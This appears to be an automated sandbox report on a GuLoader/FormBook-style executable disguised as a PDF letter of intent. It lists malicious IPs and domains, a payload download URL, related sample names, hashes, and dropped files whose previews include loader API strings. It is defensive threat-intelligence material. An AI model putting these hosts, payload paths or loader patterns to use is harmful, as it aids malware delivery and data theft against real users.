                                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                        		high
                                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdLetter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                          		high
                                          https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin6Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.ftp.ftp://ftp.gopher.Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://nsis.sf.net/NSIS_ErrorErrorLetter of Intent (LOI) For the Company November 2024 PDF.pif.exefalse
                                                  		high
                                                  http://www.newhopetoday.appybjXXpYwhPHZD.exe, 00000007.00000002.3110054215.00000000050F7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.ecosia.org/newtab/xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      217.160.0.132
                                                      		www.astrext.infoGermany
                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                      203.161.49.193
                                                      		www.eco-tops.websiteMalaysia
                                                      		45899VNPT-AS-VNVNPTCorpVNtrue
                                                      180.178.39.235
                                                      		www.73613.shopHong Kong
                                                      		45753NETSEC-HKNETSECHKtrue
                                                      69.27.100.185
                                                      		evolutioncosmetics.comCanada
                                                      		55017VDCCAfalse
                                                      3.33.130.190
                                                      		regents.healthUnited States
                                                      		8987AMAZONEXPANSIONGBtrue
                                                      216.40.34.41
                                                      		www.newhopetoday.appCanada
                                                      		15348TUCOWSCAtrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1550554
                                                      Start date and time:2024-11-06 20:31:06 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 5s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:8
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/14@6/6
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 92%
                                                      • Number of executed functions: 113
                                                      • Number of non-executed functions: 321
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target ybjXXpYwhPHZD.exe, PID 5548 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      14:33:44API Interceptor626370x Sleep call for process: xwizard.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      217.160.0.132LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                      • www.astrext.info/igvi/
                                                      08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exeGet hashmaliciousFormBookBrowse
                                                      • www.marketplaceimmo.com/q36s/?1bGpqN=3pP/L2XpSC30J9vFVSLRbULXiIxRhzb0AzWKRXEle5xB/rg0XzMhonS5eIq4WPaEzNk7&Vr=MBZl9ZMXj4u
                                                      203.161.49.193Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                      • www.futurevision.life/hxmz/
                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                      • www.harmonid.life/aq3t/
                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                      • www.harmonid.life/aq3t/
                                                      Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                      • www.fitlifa.xyz/6tsn/
                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                      • www.simplek.top/ep69/
                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                      • www.simplek.top/ep69/
                                                      SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                      • www.futurevision.life/hxmz/
                                                      Udspecialiser45.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.funtechie.top/udud/
                                                      qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
                                                      • www.winnov8.top/abt9/
                                                      PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                      • www.innovtech.life/nq8t/
                                                      69.27.100.185FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            tuN7TvKdgH.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                              Legal Action Documents PDF.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                3.33.130.1902ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.myplayamate.llc/rhg0/
                                                                FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                                                                • www.ontohealth.net/xqh1/
                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                • www.marketprediction.app/ucmb/
                                                                BkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                                • www.6686vi38.app/2jrh/
                                                                2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                • www.bidiez.com/01ng/?pP=DKK6a8PuthPc5ErrRrUbqhrmbP0bjeSkTcQU4x169SXHcyb2o6vFTIaCYUtclW/lDJA6K99MZF0w0Rv4V8fYsQ/Owb2oIOoLiZkxZhnBqViSzSDNrw==&UJO=A6MH4FUp
                                                                padvVY1AW1.exeGet hashmaliciousFormBookBrowse
                                                                • www.theclydefund.info/iqn9/
                                                                FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                • www.mycompensation.xyz/2wn6/
                                                                INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                • www.robotcurut.xyz/37zt/
                                                                Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                • www.econsultoria.online/azb9/
                                                                icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                • www.mythkitchen.net/jpec/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.astrext.infoLlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                • 217.160.0.132
                                                                Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                • 217.160.0.132
                                                                www.73613.shop19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                • 180.178.39.237
                                                                www.newhopetoday.appA4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                • 216.40.34.41
                                                                LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                • 216.40.34.41
                                                                zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                • 216.40.34.41
                                                                10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                • 216.40.34.41

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ONEANDONE-ASBrauerstrasse48DEhttp://www.intelliclicksoftware.net/clicktrack2/click.aspx?ActionType=CreateHistory&CustomerID=GM-CSATRANS&ParentRecordID=&Campaign=Thank%20You%20For%20Your%20Business%20SR&Name=&Company=&Phone=&Email=&Subject=Click%20Through&WebNav=True&URL=http://johnvugrin.comGet hashmaliciousHTMLPhisherBrowse
                                                                • 74.208.239.192
                                                                unb4AWV6Fe.exeGet hashmaliciousFormBookBrowse
                                                                • 212.227.247.44
                                                                FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.142
                                                                Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                • 217.76.156.252
                                                                PO_11000262.vbsGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.219
                                                                1V4xpXT91O.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 87.106.236.48
                                                                8CwKupnahl.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 87.106.236.48
                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, XWormBrowse
                                                                • 74.208.236.140
                                                                09Iz0ja549.exeGet hashmaliciousFormBookBrowse
                                                                • 217.160.0.158
                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWormBrowse
                                                                • 74.208.236.140
                                                                VDCCAFUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                YzvChS4FPi.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 69.27.100.185
                                                                tuN7TvKdgH.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 69.27.100.185
                                                                Legal Action Documents PDF.bat.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 69.27.100.185
                                                                https://tailingsandminewaste.comGet hashmaliciousUnknownBrowse
                                                                • 69.27.124.175
                                                                06V2RO89xu.elfGet hashmaliciousMiraiBrowse
                                                                • 69.27.113.239
                                                                QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 69.27.116.4
                                                                quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 69.27.116.4
                                                                Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 69.27.116.4
                                                                NETSEC-HKNETSECHK19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                • 180.178.39.237
                                                                la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                • 111.68.87.180
                                                                la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                • 110.173.49.15
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 112.121.176.48
                                                                na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 180.178.54.13
                                                                https://saaxzz2569.cyou/m/user/indexGet hashmaliciousUnknownBrowse
                                                                • 52.128.230.226
                                                                z3hir.arm.elfGet hashmaliciousMiraiBrowse
                                                                • 148.66.62.253
                                                                http://pp578bb256.top/Get hashmaliciousUnknownBrowse
                                                                • 52.128.228.67
                                                                yakov.x86.elfGet hashmaliciousMiraiBrowse
                                                                • 69.72.85.10
                                                                http://a.vip3656qwe.cc/Get hashmaliciousUnknownBrowse
                                                                • 148.66.1.82
                                                                VNPT-AS-VNVNPTCorpVNnuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 14.232.223.49
                                                                2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                                • 203.161.41.204
                                                                yakuza.sh.elfGet hashmaliciousUnknownBrowse
                                                                • 14.161.12.200
                                                                h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                                                                • 113.169.120.18
                                                                Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                • 203.161.49.193
                                                                D7R Image_capture 28082024 JPEG FILE.exeGet hashmaliciousFormBookBrowse
                                                                • 203.161.46.201
                                                                56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                • 203.161.41.204
                                                                p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                • 203.161.41.204
                                                                arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                • 14.250.58.12
                                                                sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                • 14.255.140.94

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                37f463bf4616ecd445d4a1937da06e19FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                • 69.27.100.185
                                                                rA01_278 Check list#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                VZ7xFmeuPX.exeGet hashmaliciousUnknownBrowse
                                                                • 69.27.100.185
                                                                2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                p7cCXP3hDz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.27.100.185
                                                                fIwP4c7xYt.exeGet hashmaliciousGuLoaderBrowse
                                                                • 69.27.100.185

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dllQuotation.exeGet hashmaliciousGuLoaderBrowse
                                                                  Quotation.exeGet hashmaliciousGuLoaderBrowse
                                                                    REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      REQUEST FOR QUOTATION.exeGet hashmaliciousGuLoaderBrowse
                                                                        Request for Quotation.exeGet hashmaliciousGuLoaderBrowse
                                                                          Request for Quotation.exeGet hashmaliciousGuLoaderBrowse
                                                                            PriceListE2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              PriceListE2024.exeGet hashmaliciousGuLoaderBrowse
                                                                                Produccion.exeGet hashmaliciousGuLoaderBrowse
                                                                                  card_residente_85ds6gf202405.exeGet hashmaliciousGuLoaderBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\293v7V-J3

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\xwizard.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\BooConf.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):45
                                                                                    Entropy (8bit):4.7748605961854445
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                                                    MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                                                    SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                                                    SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                                                    SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

                                                                                    C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11264
                                                                                    Entropy (8bit):5.774411073650885
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:eB2HS+ihg200uWz947Wzvxu6v0MI7JOde+Ij5Z77dslFsE+:3S62Gw947ExuGDI7J8EF7KIE
                                                                                    MD5:BE2621A78A13A56CF09E00DD98488360
                                                                                    SHA1:75F0539DC6AF200A07CDB056CDDDDEC595C6CFD2
                                                                                    SHA-256:852047023BA0CAE91C7A43365878613CFB4E64E36FF98C460E113D5088D68EF5
                                                                                    SHA-512:B80CF1F678E6885276B9A1BFD9227374B2EB9E38BB20446D52EBE2C3DBA89764AA50CB4D49DF51A974478F3364B5DBCBC5B4A16DC8F1123B40C89C01725BE3D1
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                    • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                    • Filename: REQUEST FOR QUOTATION.exe, Detection: malicious, Browse
                                                                                    • Filename: REQUEST FOR QUOTATION.exe, Detection: malicious, Browse
                                                                                    • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                    • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                                    • Filename: PriceListE2024.exe, Detection: malicious, Browse
                                                                                    • Filename: PriceListE2024.exe, Detection: malicious, Browse
                                                                                    • Filename: Produccion.exe, Detection: malicious, Browse
                                                                                    • Filename: card_residente_85ds6gf202405.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....e.Q...........!................9'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..@....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmc.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):27
                                                                                    Entropy (8bit):4.134336113194451
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:iGAeSMn:lAeZ
                                                                                    MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                                                    SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                                                    SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                                                    SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                                                    Malicious:false
                                                                                    Preview:[Access]..Setting=Enabled..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Deploys.jur

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):499509
                                                                                    Entropy (8bit):1.2479638079935327
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:2e2ADTXn7YNFoMnOU7B0MyikqXVkmkE4sOM:2eTTLYzoM9VsmFacOM
                                                                                    MD5:E10D8BA814468FEA91340228B53A154E
                                                                                    SHA1:C2A368671FFB6B5A01E41F67BC05FABEDED4ED1A
                                                                                    SHA-256:9E1C925997A281A90571D928B7C9E20FD67C2394093C94D5825E0A3C6CB6F3F6
                                                                                    SHA-512:3A410C9464C6BD79ADDB8CB677DBC43C2FD62D6B3004032DCAA147CF2A477DA909032287F733C8D1FFC54D0A49A35846BF5E04E04ADAD3543EBD4DA1B35B1609
                                                                                    Malicious:false
                                                                                    Preview:..................................3............................................./...........................8...........d.............................................#............."..................................5...~..Z........................................S......B...........................G. ...............9..................................................................................................................................... ............................].................................................0...............8..............~...............................v..............................................................................................................................................>...o.........................................l....<...........................................v........"............................................................................_.....................................................................?............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Gennembrudt.Dav

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6400
                                                                                    Entropy (8bit):4.376335142822035
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:73L1Ok+IGQ5tyqg3vdkHVniM+WRup864qD7EQgfyJY3bYzn5utyA1q:77Y+z5wqyKgvDu64qPaINcq
                                                                                    MD5:916C029867D06F8B811E0C2F7323999F
                                                                                    SHA1:910D1F60A75BF0FB2D52EE49852485FE27B21220
                                                                                    SHA-256:1832FAA9B36AD80B5E6614A11F8945D241A44BB11326DFE9CD3C779722D22289
                                                                                    SHA-512:F79B98C4C7B0DA8E2D04FB8A6743370CE3EE6277AA7008ADF02B7B055A5DD9CACEB57E370D9893DB0C63289282BFAD1955A2975AAB80C254DB23AC6EF7B025FA
                                                                                    Malicious:false
                                                                                    Preview:..........333....-...........i..u............ffffff......X....6666.............................k...e...r...n...e...l.tt3..u2...:...:...C...r...e...a...t.Q.e...F...i...l...e...A...(...m... ...r...4... .N.,... ...i... ...0...x...8...0...0...0...0...0...0.7.0...,... ...i... ...0...,... ...p... ...0...,... ...i..B ...4...,... ...i.LL ...0...x...8...0..",... ...i... ...0.y.).MMi......rr...8...q...k...e...r...n...e...l...3..o2...:.GG:...S...e...t...F...i...l...e...P...o...i...n...t..Me...r...(...i... ...r...8...,... ...i... ...2.<<3...0...1...2... ..\,... ...i... ...0...,...i..W .H.0...)...i.......r...4...q...k...e...r...n...e.7.l..w3...2...:...:...V...i...r...t...u...a...l...A...l...l...o...c..o(...i.., ...0...,...i..i ...2...2...6...9..V5...9...3...6...,... ...i... ...0...x..73...0...0...0...,... ...i... ...0...x.x.4...0...)...p.......r...2...q.ook.yye...r...n...e...l...3...2..{:...:...R...e...a...d...F...i..9l...e...(...i... ...r...8..6,..4 ...i.II ...r...2...,... ..0i... ...2..Q2..l6...9

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Squonk.Bib

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):276806
                                                                                    Entropy (8bit):7.516532348830352
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:WP8lLj2tJcBu6LysllRFtIkau0Sf3t609D:WUpjRBuQ2kau1fd6Y
                                                                                    MD5:AB16D1A3B5B1A209735D521B214A9900
                                                                                    SHA1:339E11522947458A52F97FD776EB6DD661F998AB
                                                                                    SHA-256:88C256014B094E2F62C09570D35308526BB9EFB4873D85DC8AE8B51AF681B6D6
                                                                                    SHA-512:32A940D48BC8382677A9CB7BA03BF67A98EABEEC56A43F622DA23EFD4066DC8400DAA0506531DAAD236A0FEAF9350CF0341E211701A94A9F64A87F5740A3AC72
                                                                                    Malicious:false
                                                                                    Preview:..........................................;.....................................[.................//.......nn..U...........&&.......%%%........4.gg.g.ee.R......i..............JJJ..RR.?.....2...pp.].qqq.....KKKKK.DD......cc....................OO......b.&&.##......................<.K......```.......k.......AA.......W..........................N...............ii.................................>........mm.!!...5555......................NN..f....................jj........_..................f........................ZZZZZZZ..u......BBB..........8.........<<........................................ii.....L..$........__..III...88............................................222.....[[........F................................ff.TT...!......mm.......a.............................B.....3............OO.H.....BBB......sss..........**............++.........\\\\\...........44...bb...........................QQ..}}}........TT............ccccc........**............?........^^^...jj......j.yyyy..............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise\skospnde.mor

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):331684
                                                                                    Entropy (8bit):1.2574385597926245
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:xblGMxZHaoty4DCyveets9uVE+hlt9QUy01W7Mf:BMlorDCy2etvHQK1R
                                                                                    MD5:05CCC9BDA38B2476C906FCEE3E8EA874
                                                                                    SHA1:1F15809DAA794E75A5656F99F46318401BBE2A1F
                                                                                    SHA-256:C36D383530F12BACDF0FFE1D51FE68B0CD434A44B269F0AEA0387A0070FF5EAE
                                                                                    SHA-512:43296487A30DAC5197862F49B42543D64DF02B65C663D4B7F9EBD1DD91BA5205073C981B9424ABF51438022FF5924218E62238DCC29730533562A2CB7138AB8E
                                                                                    Malicious:false
                                                                                    Preview:.....................................>..........d.........%...............P..............s...........................................................................+....:..J......l............X...............................1....J..........................k............Y.............Z.............u.........f.......................JB..l<............^...........7................(........(..........q.....................................................................5.........,.......................................G.....Z.....F......................].8..............................j............................................................R.................................C...............d...........................................................;|........................5................................................*..........G............b...............................C.................L............w..............................................................................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\husholdere.sel

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):301131
                                                                                    Entropy (8bit):1.255297599628044
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:kwCsez5LtC8Z3XOb+wB74xr9Zmz6R2lfOEMjq87821laQZkzxioroCdsIDW7qJ8h:k/j9QhoJs8CkVxNxxoRaNHI2KK
                                                                                    MD5:516B1DF664E8BF7AB8CAACBF4DC516DA
                                                                                    SHA1:49EECB5BD8788E0C59AFFDE73741CFAC314FDC93
                                                                                    SHA-256:BA8EE4ABE77BD1E22ED695EAF26A38CC75991E88F205DB5ECB82561657C5BF17
                                                                                    SHA-512:6B2D97DD182233E33DC12C57779C25E4C9E785BB16E903ECD3E114128260DB4245B1F92E1F41C16667BB3ACD9229F81A2155141D6079CB41AC03562C478D7362
